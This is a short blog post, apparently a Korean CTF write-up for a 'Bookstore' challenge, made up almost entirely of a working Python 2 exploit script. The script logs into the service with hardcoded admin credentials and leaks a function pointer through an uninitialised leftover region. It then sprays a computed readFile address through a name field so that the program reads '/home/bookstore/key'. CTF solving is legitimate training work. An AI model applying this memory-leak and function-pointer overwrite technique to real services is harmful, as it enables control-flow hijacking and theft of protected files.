This problem didn't take long to solve, but it was annoying because the leak occasionally failed.

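I'm not sure whether this can really be called a stack spray, but in any case the problem is that a leftover region gets referenced, so that is what I called it. Now I have to do Bookstore2 too... and my homework... argh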


# Python 2 script. banner(), p32() and up32() are provided by hackutil,
# which is not included on the page.
from hackutil import *
from socket import *
from time import *
from telnetlib import *

HOST = '192.168.136.169'
PORT = 31330

#====================================================
offset_func1_read = 0xd2
adminID = 'helloadmin'
adminPW = 'iulover!@#$'
#====================================================

banner()

print "===================[ Phase 1 : Leak FuncPointer ]=================="

sock = socket(AF_INET, SOCK_STREAM)
sock.connect((HOST, PORT))

# log in
sock.recv(1024)
sock.send(adminID)
sleep(0.1)
sock.recv(1024)
sock.send(adminPW)
sleep(0.1)
sock.recv(1024)

sock.send('1\n')  # addBook
sleep(0.1)
sock.recv(2046)

sock.send('A')  # name
sleep(0.1)
sock.recv(2046)

sock.send('A')  # desc
sleep(0.1)
sock.recv(2046)

sock.send('0\n')  # book
sleep(0.1)
sock.recv(2046)

sock.send('2\n')  # modify
sleep(0.1)
sock.recv(2046)

sock.send('0\n')
sleep(0.1)
sock.recv(2046)

sock.send('3\n')  # all
sleep(0.1)
sock.recv(2046)

sock.send(str(0x33333333)+'\n')  # stock
sleep(0.1)
sock.recv(2046)

sock.send(str(0x34343434)+'\n')  # price
sleep(0.1)
sock.recv(2046)

sock.send('1\n')  # ship
sleep(0.1)
sock.recv(2046)

sock.send('1\n')  # available
sleep(0.1)
sock.recv(2046)

sock.send('A'*20)  # name
sleep(0.1)
sock.recv(2046)

sock.send('B'*20)  # description
sleep(0.1)
sock.recv(2046)

sock.send('0\n')  # back
sleep(0.1)
sock.recv(2046)

#============================================

sock.send('4\n')  # view
sleep(0.1)

data = sock.recv(2048)
#sleep(0.1)
# the 4 bytes following the '3333' marker (the stock value) are read as the function pointer
funcptr1 = up32(data[data.find('3333')+4:data.find('3333')+8])[0]
readFile = funcptr1 - offset_func1_read
print "[*] Find funcptr1 : "+hex(funcptr1)
print "[*] Find ReadFile : "+hex(readFile)


#mainmenu

#modify_name

print "================[ Phase 2 : Attack with Stack Spray ]==============="

sock.send('2\n')  # modify
sleep(0.1)
sock.recv(2046)

sock.send('0\n')
sleep(0.1)
sock.recv(2046)

sock.send('1\n')  # name
sleep(0.1)
sock.recv(2046)

sock.send(p32(readFile)*125)
sleep(0.1)
sock.recv(2046)

#============================================

sock.send('3\n')  # all
sleep(0.1)
sock.recv(2046)

sock.send('1234\n')  # stock
sleep(0.1)
sock.recv(2046)

sock.send('1234\n')  # price
sleep(0.1)
sock.recv(2046)

sock.send('0\n')  # ship
sleep(0.1)
sock.recv(2046)

sock.send('1\n')  # available
sleep(0.1)
sock.recv(2046)

sock.send('/home/bookstore/key\x00')  # name
sleep(0.1)
sock.recv(2046)

sock.send('Fxxx_Bookstore')  # desc
sleep(0.1)
sock.recv(2046)

sock.send('4\n')
sleep(0.1)
sock.recv(2046)

sock.send('1\n')
sleep(0.1)
sock.recv(2046)

sock.send('0\n')
sleep(0.1)
sock.recv(2046)

sock.send('3\n')  # view
sleep(0.1)
sock.recv(2046)

sock.send('0\n')
sleep(0.1)
data = sock.recv(2048)
print "Key : "+data[data.find('Fxxx_Bookstore')+15:data.find('\n', data.find('Fxxx_Bookstore')+15)]

sock.close()

__미니__

E-mail : skyclad0x7b7@gmail.com Won't you make a contract with me and become a super hacker?
